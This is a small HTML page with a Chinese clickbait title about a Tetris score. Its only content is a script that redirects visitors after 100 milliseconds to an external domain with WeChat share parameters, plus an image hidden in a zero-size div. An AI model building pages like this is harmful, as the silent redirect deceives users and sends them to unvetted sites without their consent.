<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>以我的智商才能玩48850分，俄罗斯方块另类玩法，瞬间感觉自己智商满满的</title>
    <script language="javascript" type="text/javascript">
        setTimeout(hello,100);
        function hello(){
            window.location.href="http://167275.xiguazhi.com.cn/ljsp/?gm=8692226611&from=groupmessage&isappinstalled=0";
        }
    </script>
</head>
<body>
    <div style='margin:0 auto;width:0px;height:0px;overflow:hidden;'>
        <img src="../static/img/test.png" width='500px' height="500px">
    </div>
</body>
</html>
